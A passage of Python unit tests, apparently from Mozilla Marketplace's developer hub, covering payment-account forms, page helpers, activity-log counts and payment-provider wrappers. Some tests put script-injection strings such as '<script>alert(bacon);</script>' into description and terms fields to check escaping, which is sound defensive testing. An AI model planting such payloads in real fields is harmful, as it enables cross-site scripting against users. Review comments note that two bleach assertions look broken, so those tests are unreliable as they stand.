    status and queues a re-review when it was previously public."""

    fixtures = fixture('webapp_337141', 'prices')

    def setUp(self):
        super(TestPaidRereview, self).setUp()
        self.addon = Addon.objects.get(pk=337141)
        # Incomplete app that was public before going paid.
        self.addon.update(status=amo.STATUS_NULL,
                          highest_status=amo.STATUS_PUBLIC)
        self.provider = get_provider(name='bango')
        self.price = Price.objects.filter()[0]
        AddonPremium.objects.create(addon=self.addon, price=self.price)
        self.user = UserProfile.objects.get(email='[email protected]')
        amo.set_user(self.user)
        seller = models.SolitudeSeller.objects.create(
            resource_uri='/path/to/sel', user=self.user)
        self.account = models.PaymentAccount.objects.create(
            user=self.user, uri='asdf', name='test', inactive=False,
            solitude_seller=seller, account_id=123, agreed_tos=True)
        self.kwargs = {
            'addon': self.addon,
            'user': self.user,
            'provider': self.provider,
        }

    @mock.patch('mkt.webapps.models.Webapp.is_fully_complete',
                new=mock.MagicMock())
    def test_rereview(self):
        """Restoring to PUBLIC queues exactly one re-review entry."""
        form = forms_payments.AccountListForm(
            data={'accounts': self.account.pk}, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        eq_(self.addon.status, amo.STATUS_PUBLIC)
        eq_(RereviewQueue.objects.count(), 1)
        form = forms_payments.AccountListForm(None, **self.kwargs)
        eq_(form.fields['accounts'].empty_label, None)

    def test_disagreed_tos_rereview(self):
        # Accounts without agreed ToS are excluded from the choices.
        self.account.update(agreed_tos=False)
        form = forms_payments.AccountListForm(
            data={'accounts': self.account.pk}, **self.kwargs)
        assert not form.is_valid()
        eq_(form.errors['accounts'],
            ['Select a valid choice. That choice is not one of the available '
             'choices.'])

    @mock.patch('mkt.webapps.models.Webapp.is_fully_complete',
                new=mock.MagicMock())
    def test_norereview(self):
        # Restoring to a non-public status must not queue a re-review.
        self.addon.update(highest_status=amo.STATUS_PENDING)
        form = forms_payments.AccountListForm(
            data={'accounts': self.account.pk}, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        eq_(self.addon.status, amo.STATUS_PENDING)
        eq_(RereviewQueue.objects.count(), 0)
class TestRestoreAppStatus(amo.tests.TestCase):
    """_restore_app_status puts an incomplete app back to its previous
    status, falling back to PENDING when there is none to restore."""

    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.addon = Addon.objects.get(pk=337141)
        self.addon.status = amo.STATUS_NULL

    def _restore_from(self, highest_status):
        # Seed the remembered status, run the helper, report the result.
        self.addon.highest_status = highest_status
        forms_payments._restore_app_status(self.addon)
        return self.addon.status

    def test_to_public(self):
        eq_(self._restore_from(amo.STATUS_PUBLIC), amo.STATUS_PUBLIC)

    def test_to_null(self):
        # Apps without a highest status default to PENDING.
        eq_(self._restore_from(amo.STATUS_NULL), amo.STATUS_PENDING)
class TestBangoAccountForm(Patcher, amo.tests.TestCase):
    """Tests for BangoPaymentAccountForm: bank fields are required only
    when first creating an account, and save() updates the account."""

    fixtures = fixture('webapp_337141')

    def setUp(self):
        super(TestBangoAccountForm, self).setUp()
        self.app = Addon.objects.get(pk=337141)
        self.user = self.app.addonuser_set.get().user
        form = forms_payments.BangoPaymentAccountForm()
        self.data = {}
        # Fill every field of an unbound form with a plausible value:
        # currency fields get 'USD', ISO country fields get 'USA'.
        for field in form.fields:
            if 'currency' in field:
                self.data[field] = 'USD'
            elif 'Iso' in field:
                self.data[field] = 'USA'
            else:
                self.data[field] = '[email protected]'  # Good enough.

    def test_bank_required(self):
        """When there is no account, require bank details."""
        form = forms_payments.BangoPaymentAccountForm(self.data)
        assert form.is_valid(), form.errors
        del self.data['bankName']
        form = forms_payments.BangoPaymentAccountForm(self.data)
        assert not form.is_valid(), form.errors

    def test_bank_not_required(self):
        """When an account is specified, don't require bank details."""
        payment = setup_payment_account(self.app, self.user).payment_account
        form = forms_payments.BangoPaymentAccountForm(
            self.data, account=payment)
        assert form.is_valid(), form.errors
        del self.data['bankName']
        form = forms_payments.BangoPaymentAccountForm(
            self.data, account=payment)
        assert form.is_valid(), form.errors  # Still valid, even now.

    def test_on_save(self):
        """Save should just trigger the account's update function."""
        payment = setup_payment_account(self.app, self.user).payment_account
        form = forms_payments.BangoPaymentAccountForm(
            self.data, account=payment)
        assert form.is_valid(), form.errors
        # Override cleaned_data so only these fields get pushed through.
        form.cleaned_data = {'account_name': 'foo', 'name': 'bob'}
        form.save()
        payment = payment.reload()
        eq_(payment.name, 'foo')
        # The Bango client (patched by Patcher) is hit with the account uid.
        self.bango_patcher.api.by_url.assert_called_with('uid')
class TestBokuAccountForm(amo.tests.TestCase):
    """BokuAccountForm is valid iff the Boku service-id verification call
    succeeds; an HttpClientError maps to a 'service_id' field error."""

    fixtures = fixture('webapp_337141')

    def setUp(self):
        super(TestBokuAccountForm, self).setUp()
        self.app = Addon.objects.get(pk=337141)
        self.user = self.app.addonuser_set.get().user

    @mock.patch('mkt.developers.forms_payments.client')
    def test_valid_when_verified(self, client):
        verify_service = client.api.boku.verify_service.post
        verify_service.return_value = ''
        form = forms_payments.BokuAccountForm({'account_name': 'Boku Acct',
                                               'service_id': 'clearly-valid'})
        ok_(form.is_valid())
        verify_service.assert_called_with({'service_id': 'clearly-valid'})

    @mock.patch('mkt.developers.forms_payments.client')
    def test_invalid_when_not_verified(self, client):
        verify_service = client.api.boku.verify_service.post
        # Simulate the verification endpoint rejecting the id.
        verify_service.side_effect = HttpClientError
        form = forms_payments.BokuAccountForm({'account_name': 'Boku Acct',
                                               'service_id': 'not-valid'})
        ok_(not form.is_valid())
        eq_(len(form.errors['service_id']), 1)
        verify_service.assert_called_with({'service_id': 'not-valid'})
########NEW FILE########
__FILENAME__ = test_helpers
# -*- coding: utf-8 -*-
import unittest
import urllib
from django.core.urlresolvers import reverse
from django.utils import translation
from mock import Mock
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo
import amo.tests
from addons.models import Addon
from amo.tests.test_helpers import render
from files.models import File, Platform
from mkt.developers import helpers
from users.models import UserProfile
from versions.models import Version
def test_hub_page_title():
    """hub_page_title is mkt_page_title with a ' | Developers' suffix (or
    just 'Developers' with no title) and joins title + addon name."""
    translation.activate('en-US')
    request = Mock()
    request.APP = None
    addon = Mock()
    addon.name = 'name'
    ctx = {'request': request, 'addon': addon}
    title = 'Oh hai!'
    # With a title: '<title> | Developers'.
    s1 = render('{{ hub_page_title("%s") }}' % title, ctx)
    s2 = render('{{ mkt_page_title("%s | Developers") }}' % title, ctx)
    eq_(s1, s2)
    # Without a title: just 'Developers'.
    s1 = render('{{ hub_page_title() }}', ctx)
    s2 = render('{{ mkt_page_title("Developers") }}', ctx)
    eq_(s1, s2)
    # With an addon: '<title> | <addon name>'.
    s1 = render('{{ hub_page_title("%s", addon) }}' % title, ctx)
    s2 = render('{{ mkt_page_title("%s | %s") }}' % (title, addon.name), ctx)
    eq_(s1, s2)
class TestNewDevBreadcrumbs(amo.tests.TestCase):
    """hub_breadcrumbs renders the developer-hub breadcrumb trail:
    Home > Developers [> My Submissions > app] [> extra items]."""

    def setUp(self):
        self.request = Mock()
        self.request.APP = None

    def test_no_args(self):
        # No product and no items renders nothing at all.
        s = render('{{ hub_breadcrumbs() }}', {'request': self.request})
        eq_(s, '')

    def test_with_items(self):
        s = render("""{{ hub_breadcrumbs(items=[('/foo', 'foo'),
                                                ('/bar', 'bar')]) }}'""",
                   {'request': self.request})
        crumbs = pq(s)('li')
        expected = [
            ('Home', reverse('home')),
            ('Developers', reverse('ecosystem.landing')),
            ('foo', '/foo'),
            ('bar', '/bar'),
        ]
        amo.tests.check_links(expected, crumbs, verify=False)

    def test_with_app(self):
        product = Mock()
        product.name = 'Steamcube'
        product.id = 9999
        product.app_slug = 'scube'
        product.type = amo.ADDON_WEBAPP
        s = render("""{{ hub_breadcrumbs(product) }}""",
                   {'request': self.request, 'product': product})
        crumbs = pq(s)('li')
        # The final (current) crumb has no link.
        expected = [
            ('Home', reverse('home')),
            ('Developers', reverse('ecosystem.landing')),
            ('My Submissions', reverse('mkt.developers.apps')),
            ('Steamcube', None),
        ]
        amo.tests.check_links(expected, crumbs, verify=False)

    def test_with_app_and_items(self):
        # With extra items, the app crumb links to its edit page.
        product = Mock()
        product.name = 'Steamcube'
        product.id = 9999
        product.app_slug = 'scube'
        product.type = amo.ADDON_WEBAPP
        product.get_dev_url.return_value = reverse('mkt.developers.apps.edit',
                                                   args=[product.app_slug])
        s = render("""{{ hub_breadcrumbs(product,
                                         items=[('/foo', 'foo'),
                                                ('/bar', 'bar')]) }}""",
                   {'request': self.request, 'product': product})
        crumbs = pq(s)('li')
        expected = [
            ('Home', reverse('home')),
            ('Developers', reverse('ecosystem.landing')),
            ('My Submissions', reverse('mkt.developers.apps')),
            ('Steamcube', product.get_dev_url()),
            ('foo', '/foo'),
            ('bar', '/bar'),
        ]
        amo.tests.check_links(expected, crumbs, verify=False)
def test_summarize_validation():
    """Error/warning pluralisation in the validation summary matches the
    counts on the validation object."""
    validation = Mock()
    cases = [
        (1, 1, u'1 error, 1 warning'),
        (2, 1, u'2 errors, 1 warning'),
        (2, 2, u'2 errors, 2 warnings'),
    ]
    for errors, warnings, expected in cases:
        validation.errors = errors
        validation.warnings = warnings
        eq_(render('{{ summarize_validation(validation) }}',
                   {'validation': validation}),
            expected)
def test_log_action_class():
    """log_action_class yields 'action-<action_class>' for log types that
    define an action class and '' for those that don't.

    Fix: the original created a throwaway ``Mock()`` that was immediately
    shadowed by the loop variable, and ignored the dict key — both removed.
    """
    for log_type in amo.LOG_BY_ID.values():
        if log_type.action_class is not None:
            expected = 'action-' + log_type.action_class
        else:
            expected = ''
        eq_(render('{{ log_action_class(id) }}', {'id': log_type.id}),
            expected)
class TestDisplayUrl(unittest.TestCase):
    """display_url should render percent-encoded URLs back to readable
    unicode, regardless of the byte encoding that was quoted."""

    def setUp(self):
        # Python 2: decode the utf-8 source literal into a unicode URL.
        self.raw_url = u'http://host/%s' % 'フォクすけといっしょ'.decode('utf8')

    def test_utf8(self):
        url = urllib.quote(self.raw_url.encode('utf8'))
        eq_(render('{{ url|display_url }}', {'url': url}),
            self.raw_url)

    def test_unicode(self):
        # Same quoting, but handed to the filter as a unicode object.
        url = urllib.quote(self.raw_url.encode('utf8'))
        url = unicode(url, 'utf8')
        eq_(render('{{ url|display_url }}', {'url': url}),
            self.raw_url)

    def test_euc_jp(self):
        # Bytes quoted from a non-utf8 encoding must still round-trip.
        url = urllib.quote(self.raw_url.encode('euc_jp'))
        eq_(render('{{ url|display_url }}', {'url': url}),
            self.raw_url)
class TestDevFilesStatus(amo.tests.TestCase):
    """dev_files_status maps (file status, addon status) pairs to the
    marketplace status label shown to developers."""

    def setUp(self):
        platform = Platform.objects.create(id=amo.PLATFORM_ALL.id)
        self.addon = Addon.objects.create(type=1, status=amo.STATUS_UNREVIEWED)
        self.version = Version.objects.create(addon=self.addon)
        self.file = File.objects.create(version=self.version,
                                        platform=platform,
                                        status=amo.STATUS_UNREVIEWED)

    def expect(self, expected):
        """Assert the single file is counted once with label `expected`."""
        cnt, msg = helpers.dev_files_status([self.file], self.addon)[0]
        eq_(cnt, 1)
        eq_(msg, expected)

    def test_unreviewed_lite(self):
        self.addon.status = amo.STATUS_LITE
        self.file.status = amo.STATUS_UNREVIEWED
        self.expect(amo.MKT_STATUS_CHOICES[amo.STATUS_UNREVIEWED])

    def test_unreviewed_public(self):
        # Unreviewed file on a public/nominated addon shows as NOMINATED.
        self.addon.status = amo.STATUS_PUBLIC
        self.file.status = amo.STATUS_UNREVIEWED
        self.expect(amo.MKT_STATUS_CHOICES[amo.STATUS_NOMINATED])

    def test_unreviewed_nominated(self):
        self.addon.status = amo.STATUS_NOMINATED
        self.file.status = amo.STATUS_UNREVIEWED
        self.expect(amo.MKT_STATUS_CHOICES[amo.STATUS_NOMINATED])

    def test_unreviewed_lite_and_nominated(self):
        self.addon.status = amo.STATUS_LITE_AND_NOMINATED
        self.file.status = amo.STATUS_UNREVIEWED
        self.expect(amo.MKT_STATUS_CHOICES[amo.STATUS_NOMINATED])

    def test_reviewed_lite(self):
        self.addon.status = amo.STATUS_LITE
        self.file.status = amo.STATUS_LITE
        self.expect(amo.MKT_STATUS_CHOICES[amo.STATUS_LITE])

    def test_reviewed_public(self):
        self.addon.status = amo.STATUS_PUBLIC
        self.file.status = amo.STATUS_PUBLIC
        self.expect(amo.MKT_STATUS_CHOICES[amo.STATUS_PUBLIC])

    def test_disabled(self):
        # A disabled file reports DISABLED regardless of addon status.
        self.addon.status = amo.STATUS_PUBLIC
        self.file.status = amo.STATUS_DISABLED
        self.expect(amo.MKT_STATUS_CHOICES[amo.STATUS_DISABLED])
class TestDevAgreement(amo.tests.TestCase):
    """dev_agreement_ok is False only when the agreement was updated
    *after* the user last read it; unset/garbage dates are treated as
    OK."""

    def setUp(self):
        self.user = UserProfile()

    def test_none(self):
        # No last-updated setting: nothing to re-agree to.
        with self.settings(DEV_AGREEMENT_LAST_UPDATED=None):
            eq_(helpers.dev_agreement_ok(self.user), True)

    def test_date_oops(self):
        # A non-date setting value is tolerated, not an error.
        with self.settings(DEV_AGREEMENT_LAST_UPDATED=('wat?')):
            eq_(helpers.dev_agreement_ok(self.user), True)

    def test_not_agreed(self):
        # The user has never agreed to it so in this case we don't need to
        # worry them about changes.
        self.user.update(read_dev_agreement=None)
        with self.settings(DEV_AGREEMENT_LAST_UPDATED=
                           self.days_ago(10).date()):
            eq_(helpers.dev_agreement_ok(self.user), True)

    def test_past_agreed(self):
        # Agreement changed after the user read it -> must re-agree.
        self.user.update(read_dev_agreement=self.days_ago(10))
        with self.settings(DEV_AGREEMENT_LAST_UPDATED=self.days_ago(5).date()):
            eq_(helpers.dev_agreement_ok(self.user), False)

    def test_not_past(self):
        self.user.update(read_dev_agreement=self.days_ago(5))
        with self.settings(DEV_AGREEMENT_LAST_UPDATED=
                           self.days_ago(10).date()):
            eq_(helpers.dev_agreement_ok(self.user), True)
########NEW FILE########
__FILENAME__ = test_models
from datetime import datetime, timedelta
from os import path
from django.core.urlresolvers import NoReverseMatch
from django.test.utils import override_settings
from mock import Mock, patch
from nose.tools import eq_, ok_
import amo
import amo.tests
from addons.models import Addon
from constants.payments import PROVIDER_BANGO, PROVIDER_BOKU
from devhub.models import ActivityLog, ActivityLogAttachment
from users.models import UserProfile
from mkt.developers.models import (AddonPaymentAccount, CantCancel,
PaymentAccount, SolitudeSeller)
from mkt.developers.providers import get_provider
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from .test_providers import Patcher
TEST_PATH = path.dirname(path.abspath(__file__))
ATTACHMENTS_DIR = path.abspath(path.join(TEST_PATH, '..', '..', 'comm',
'tests', 'attachments'))
class TestActivityLogCount(amo.tests.TestCase):
    """Exercise the ActivityLog manager's review-count aggregations."""
    fixtures = fixture('webapp_337141', 'user_2519')

    def setUp(self):
        # self.lm = last day of the previous month; used to backdate log
        # rows so they fall outside the current month's window.
        now = datetime.now()
        bom = datetime(now.year, now.month, 1)
        self.lm = bom - timedelta(days=1)
        self.user = UserProfile.objects.filter()[0]
        amo.set_user(self.user)

    def test_not_review_count(self):
        # EDIT_VERSION is not a review action, so it must not be counted.
        amo.log(amo.LOG['EDIT_VERSION'], Webapp.objects.get())
        eq_(len(ActivityLog.objects.monthly_reviews()), 0)

    def test_review_count(self):
        amo.log(amo.LOG['APPROVE_VERSION'], Webapp.objects.get())
        result = ActivityLog.objects.monthly_reviews()
        eq_(len(result), 1)
        eq_(result[0]['approval_count'], 1)
        eq_(result[0]['user'], self.user.pk)

    def test_review_count_few(self):
        # Several approvals by one user aggregate into a single row.
        for x in range(0, 5):
            amo.log(amo.LOG['APPROVE_VERSION'], Webapp.objects.get())
        result = ActivityLog.objects.monthly_reviews()
        eq_(len(result), 1)
        eq_(result[0]['approval_count'], 5)

    def test_review_last_month(self):
        # Backdated to last month: excluded from monthly_reviews.
        log = amo.log(amo.LOG['APPROVE_VERSION'], Webapp.objects.get())
        log.update(created=self.lm)
        eq_(len(ActivityLog.objects.monthly_reviews()), 0)

    def test_not_total(self):
        amo.log(amo.LOG['EDIT_VERSION'], Webapp.objects.get())
        eq_(len(ActivityLog.objects.total_reviews()), 0)

    def test_total_few(self):
        for x in range(0, 5):
            amo.log(amo.LOG['APPROVE_VERSION'], Webapp.objects.get())
        result = ActivityLog.objects.total_reviews()
        eq_(len(result), 1)
        eq_(result[0]['approval_count'], 5)

    def test_total_last_month(self):
        # total_reviews has no month cutoff, so the backdated row counts.
        log = amo.log(amo.LOG['APPROVE_VERSION'], Webapp.objects.get())
        log.update(created=self.lm)
        result = ActivityLog.objects.total_reviews()
        eq_(len(result), 1)
        eq_(result[0]['approval_count'], 1)
        eq_(result[0]['user'], self.user.pk)

    def test_log_admin(self):
        # OBJECT_EDITED shows up in admin_events but not for_developer.
        amo.log(amo.LOG['OBJECT_EDITED'], Webapp.objects.get())
        eq_(len(ActivityLog.objects.admin_events()), 1)
        eq_(len(ActivityLog.objects.for_developer()), 0)

    def test_log_not_admin(self):
        # EDIT_VERSION is developer-visible, not an admin event.
        amo.log(amo.LOG['EDIT_VERSION'], Webapp.objects.get())
        eq_(len(ActivityLog.objects.admin_events()), 0)
        eq_(len(ActivityLog.objects.for_developer()), 1)
class TestPaymentAccount(Patcher, amo.tests.TestCase):
    """Model-level tests for PaymentAccount and its cancel semantics."""
    fixtures = fixture('webapp_337141', 'user_999')

    def setUp(self):
        self.user = UserProfile.objects.filter()[0]
        self.seller, self.solsel = self.create_solitude_seller()
        super(TestPaymentAccount, self).setUp()

    def create_solitude_seller(self, **kwargs):
        # Patch SolitudeSeller.create so no solitude call is made; the
        # started patcher is kept on the mock and stopped in tearDown.
        solsel_patcher = patch('mkt.developers.models.SolitudeSeller.create')
        solsel = solsel_patcher.start()
        seller_params = {'resource_uri': 'selleruri', 'user': self.user}
        seller_params.update(kwargs)
        seller = SolitudeSeller.objects.create(**seller_params)
        solsel.return_value = seller
        solsel.patcher = solsel_patcher
        return seller, solsel

    def tearDown(self):
        self.solsel.patcher.stop()
        super(TestPaymentAccount, self).tearDown()

    def test_create_bango(self):
        # Return a seller object without hitting Bango.
        self.bango_patcher.package.post.return_value = {
            'resource_uri': 'zipzap',
            'package_id': 123,
        }
        res = get_provider().account_create(
            self.user, {'account_name': 'Test Account'})
        eq_(res.name, 'Test Account')
        eq_(res.user, self.user)
        eq_(res.seller_uri, 'selleruri')
        eq_(res.account_id, 123)
        eq_(res.uri, 'zipzap')
        self.bango_patcher.package.post.assert_called_with(
            data={'paypalEmailAddress': '[email protected]',
                  'seller': 'selleruri'})
        self.bango_patcher.bank.post.assert_called_with(
            data={'seller_bango': 'zipzap'})

    def test_cancel(self):
        res = PaymentAccount.objects.create(
            name='asdf', user=self.user, uri='foo', seller_uri='uri1',
            solitude_seller=self.seller)
        addon = Addon.objects.get()
        AddonPaymentAccount.objects.create(
            addon=addon, account_uri='foo',
            payment_account=res, product_uri='bpruri')
        assert addon.reload().status != amo.STATUS_NULL
        # disable_refs=True disables the linked app and removes the link.
        res.cancel(disable_refs=True)
        assert res.inactive
        assert addon.reload().status == amo.STATUS_NULL
        assert not AddonPaymentAccount.objects.exists()

    def test_cancel_shared(self):
        # Shared accounts must not be cancellable.
        res = PaymentAccount.objects.create(
            name='asdf', user=self.user, uri='foo',
            solitude_seller=self.seller, shared=True)
        addon = Addon.objects.get()
        AddonPaymentAccount.objects.create(
            addon=addon, account_uri='foo',
            payment_account=res, product_uri='bpruri')
        with self.assertRaises(CantCancel):
            res.cancel()

    def test_cancel_multiple_accounts(self):
        # Cancelling one provider's account must not disable an app that
        # still has an account with another provider.
        acct1 = PaymentAccount.objects.create(
            name='asdf', user=self.user, uri='foo', seller_uri='uri1',
            solitude_seller=self.seller, provider=PROVIDER_BANGO)
        acct2 = PaymentAccount.objects.create(
            name='fdsa', user=self.user, uri='bar', seller_uri='uri2',
            solitude_seller=self.seller, provider=PROVIDER_BOKU)
        addon = Addon.objects.get(pk=337141)
        AddonPaymentAccount.objects.create(
            addon=addon, account_uri='foo',
            payment_account=acct1, product_uri='bpruri')
        still_around = AddonPaymentAccount.objects.create(
            addon=addon, account_uri='bar',
            payment_account=acct2, product_uri='asiuri')
        ok_(addon.reload().status != amo.STATUS_NULL)
        acct1.cancel(disable_refs=True)
        ok_(acct1.inactive)
        ok_(addon.reload().status != amo.STATUS_NULL)
        pks = AddonPaymentAccount.objects.values_list('pk', flat=True)
        eq_(len(pks), 1)
        eq_(pks[0], still_around.pk)

    def test_get_details(self):
        package = Mock()
        package.get.return_value = {'full': {'vendorName': 'a',
                                             'some_other_value': 'b'}}
        self.bango_patcher.package.return_value = package
        res = PaymentAccount.objects.create(
            name='asdf', user=self.user, uri='/foo/bar/123',
            solitude_seller=self.seller)
        deets = res.get_provider().account_retrieve(res)
        eq_(deets['account_name'], res.name)
        eq_(deets['vendorName'], 'a')
        # Only recognized package keys are exposed to the caller.
        assert 'some_other_value' not in deets
        # The package id ('123') is taken from the tail of the account uri.
        self.bango_patcher.package.assert_called_with('123')
        package.get.assert_called_with(data={'full': True})

    def test_update_account_details(self):
        res = PaymentAccount.objects.create(
            name='asdf', user=self.user, uri='foo',
            solitude_seller=self.seller)
        res.get_provider().account_update(res, {
            'account_name': 'new name',
            'vendorName': 'new vendor name',
            'something_other_value': 'not a package key'
        })
        # account_name updates the local model; vendorName is PATCHed to
        # Bango; unknown keys are dropped.
        eq_(res.name, 'new name')
        self.bango_patcher.api.by_url(res.uri).patch.assert_called_with(
            data={'vendorName': 'new vendor name'})
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
class TestActivityLogAttachment(amo.tests.TestCase):
    """Tests for ActivityLogAttachment helpers (paths, names, XSS)."""
    fixtures = ['base/addon_3615']

    # Deliberately hostile description used to verify output escaping.
    XSS_STRING = 'MMM <script>alert(bacon);</script>'

    def setUp(self):
        self.user = self._user()
        addon = Addon.objects.get()
        version = addon.latest_version
        al = amo.log(amo.LOG.COMMENT_VERSION, addon, version, user=self.user)
        self.attachment1, self.attachment2 = self._attachments(al)

    def tearDown(self):
        # Undo the thread-local user set in _user().
        amo.set_user(None)

    def _user(self):
        """Create and return a user"""
        u = UserProfile.objects.create(username='porkbelly')
        amo.set_user(u)
        return u

    def _attachments(self, activity_log):
        """
        Create and return a tuple of ActivityLogAttachment instances:
        a plain-text one and an image one carrying the XSS description.
        """
        ala1 = ActivityLogAttachment.objects.create(
            activity_log=activity_log, filepath='bacon.txt',
            mimetype='text/plain')
        ala2 = ActivityLogAttachment.objects.create(
            activity_log=activity_log, filepath='bacon.jpg',
            description=self.XSS_STRING, mimetype='image/jpeg')
        return ala1, ala2

    def test_filename(self):
        msg = ('ActivityLogAttachment().filename() returning '
               'incorrect filename.')
        eq_(self.attachment1.filename(), 'bacon.txt', msg)
        eq_(self.attachment2.filename(), 'bacon.jpg', msg)

    def test_full_path_dirname(self):
        msg = ('ActivityLogAttachment().full_path() returning incorrect path.')
        FAKE_PATH = '/tmp/attachments/'
        with self.settings(REVIEWER_ATTACHMENTS_PATH=FAKE_PATH):
            eq_(self.attachment1.full_path(), FAKE_PATH + 'bacon.txt', msg)
            eq_(self.attachment2.full_path(), FAKE_PATH + 'bacon.jpg', msg)

    def test_display_name(self):
        # Without a description, the filename is the display name.
        msg = ('ActivityLogAttachment().display_name() returning '
               'incorrect display name.')
        eq_(self.attachment1.display_name(), 'bacon.txt', msg)

    def test_display_name_xss(self):
        # The hostile description must not come back as raw markup.
        self.assertNotIn('<script>', self.attachment2.display_name())

    def test_is_image(self):
        msg = ('ActivityLogAttachment().is_image() not correctly detecting '
               'images.')
        eq_(self.attachment1.is_image(), False, msg)
        eq_(self.attachment2.is_image(), True, msg)

    def test_get_absolute_url(self):
        # Both attachments must have a resolvable URL.
        msg = ('ActivityLogAttachment().get_absolute_url() raising a '
               'NoReverseMatch exception.')
        try:
            self.attachment1.get_absolute_url()
            self.attachment2.get_absolute_url()
        except NoReverseMatch:
            assert False, msg
########NEW FILE########
__FILENAME__ = test_providers
from datetime import datetime
from django.core.exceptions import ObjectDoesNotExist
from mock import ANY, Mock, patch
from nose.tools import eq_, ok_, raises
from amo.tests import app_factory, TestCase
from constants.payments import (PROVIDER_BANGO, PROVIDER_BOKU,
PROVIDER_REFERENCE)
from mkt.developers.models import PaymentAccount, SolitudeSeller
from mkt.developers.providers import (account_check, Bango, Boku, get_provider,
Reference)
from mkt.site.fixtures import fixture
from users.models import UserProfile
class Patcher(object):
    """
    Mixin that patches every solitude client used by the payment code, so
    any attempt to call solitude from zamboni through these classes hits a
    mock instead.

    Use this class as mixin on any tests that alter payment accounts.
    If you override setUp or tearDown be sure to call super.
    """

    def setUp(self, *args, **kw):
        super(Patcher, self).setUp(*args, **kw)
        # (attribute set on self, patch target, mock name) triples.
        # Once everything has moved over to the provider, the first
        # entry can be removed.
        specs = [
            ('patched_client', 'mkt.developers.models.client',
             'test_providers.Patcher.client_patcher'),
            ('bango_patcher', 'mkt.developers.providers.Bango.client',
             'test_providers.Patcher.bango_patcher'),
            ('bango_p_patcher',
             'mkt.developers.providers.Bango.client_provider',
             'test_providers.Patcher.bango_p_patcher'),
            ('boku_patcher', 'mkt.developers.providers.Boku.client',
             'test_providers.Patcher.boku_patcher'),
            ('ref_patcher', 'mkt.developers.providers.Reference.client',
             'test_providers.Patcher.ref_patcher'),
            ('generic_patcher', 'mkt.developers.providers.Provider.generic',
             'test_providers.Patcher.generic_patcher'),
        ]
        for attr, target, mock_name in specs:
            patcher = patch(target, name=mock_name)
            mocked = patcher.start()
            # Keep a handle to the patcher itself; some tests need it.
            mocked.patcher = patcher
            setattr(self, attr, mocked)
            self.addCleanup(patcher.stop)
class TestSetup(TestCase):

    def test_multiple(self):
        """With several providers configured, the configured default wins."""
        overrides = {'PAYMENT_PROVIDERS': ['bango', 'reference'],
                     'DEFAULT_PAYMENT_PROVIDER': 'bango'}
        with self.settings(**overrides):
            eq_(get_provider().name, 'bango')
class TestBase(TestCase):

    def test_check(self):
        """account_check lets matching providers through, rejects others."""
        provider = Reference()

        @account_check
        def test(self, account):
            pass

        provider.test = test
        # Matching provider constant: the check passes silently.
        matching = PaymentAccount(provider=PROVIDER_REFERENCE)
        provider.test(provider, matching)
        # Mismatched provider constant: the check raises.
        mismatched = PaymentAccount(provider=PROVIDER_BOKU)
        with self.assertRaises(ValueError):
            provider.test(provider, mismatched)
class TestBango(Patcher, TestCase):
    """Tests for the Bango payment provider wrapper."""
    fixtures = fixture('user_999')

    def setUp(self):
        super(TestBango, self).setUp()
        self.user = UserProfile.objects.filter()[0]
        self.app = app_factory()
        self.make_premium(self.app)
        self.seller = SolitudeSeller.objects.create(
            resource_uri='sellerres', user=self.user
        )
        self.account = PaymentAccount.objects.create(
            solitude_seller=self.seller,
            user=self.user, name='paname', uri='acuri',
            inactive=False, seller_uri='selluri',
            account_id=123, provider=PROVIDER_BANGO
        )
        self.bango = Bango()

    def test_create(self):
        # An existing Bango product: its resource_uri is returned as-is.
        self.generic_patcher.product.get_object_or_404.return_value = {
            'resource_uri': 'gpuri'}
        self.bango_patcher.product.get_object_or_404.return_value = {
            'resource_uri': 'bpruri', 'bango_id': 'bango#', 'seller': 'selluri'
        }
        uri = self.bango.product_create(self.account, self.app)
        eq_(uri, 'bpruri')

    def test_create_new(self):
        # No existing Bango product: one is POSTed through the provider
        # client and the payload must carry the Bango packageId.
        self.bango_patcher.product.get_object_or_404.side_effect = (
            ObjectDoesNotExist)
        self.bango_p_patcher.product.post.return_value = {
            'resource_uri': '', 'bango_id': 1
        }
        self.bango.product_create(self.account, self.app)
        ok_('packageId' in
            self.bango_p_patcher.product.post.call_args[1]['data'])

    def test_terms_bleached(self):
        # NOTE(review): the expected text is identical to the mocked input
        # here, which makes the "bleached" assertion a no-op; the original
        # presumably expected an escaped (&lt;script&gt;) version and the
        # entities look lost to extraction — confirm against upstream.
        self.bango_patcher.sbi.agreement.get_object.return_value = {
            'text': '<script>foo</script><h3></h3>'}
        eq_(self.bango.terms_retrieve(Mock())['text'],
            u'<script>foo</script><h3></h3>')
class TestReference(Patcher, TestCase):
    """Tests for the zippy "reference" payment provider wrapper."""
    fixtures = fixture('user_999')

    def setUp(self, *args, **kw):
        super(TestReference, self).setUp(*args, **kw)
        self.user = UserProfile.objects.get(pk=999)
        self.ref = Reference()

    def test_setup_seller(self):
        self.ref.setup_seller(self.user)
        ok_(SolitudeSeller.objects.filter(user=self.user).exists())

    def test_account_create(self):
        data = {'account_name': 'account', 'name': 'f', 'email': '[email protected]'}
        res = self.ref.account_create(self.user, data)
        acct = PaymentAccount.objects.get(user=self.user)
        eq_(acct.provider, PROVIDER_REFERENCE)
        eq_(res.pk, acct.pk)
        # account_name stays local; the remaining fields are POSTed to the
        # sellers endpoint together with a generated uuid.
        self.ref_patcher.sellers.post.assert_called_with(data={
            'status': 'ACTIVE',
            'email': '[email protected]',
            'uuid': ANY,
            'name': 'f',
        })

    def make_account(self):
        # Helper: a reference-provider PaymentAccount with its own seller.
        seller = SolitudeSeller.objects.create(user=self.user)
        return PaymentAccount.objects.create(user=self.user,
                                             solitude_seller=seller,
                                             uri='/f/b/1',
                                             name='account name',
                                             provider=PROVIDER_REFERENCE)

    def test_terms_retrieve(self):
        account = self.make_account()
        self.ref.terms_retrieve(account)
        assert self.ref_patcher.terms.called

    def test_terms_bleached(self):
        # NOTE(review): expected text equals the mocked input verbatim; the
        # original presumably asserted an escaped &lt;script&gt; with <a>
        # kept — entities look lost to extraction, confirm upstream.
        account = self.make_account()
        account_mock = Mock()
        account_mock.get.return_value = {'text':
                                         '<script>foo</script><a>bar</a>'}
        self.ref_patcher.terms.return_value = account_mock
        eq_(self.ref.terms_retrieve(account)['text'],
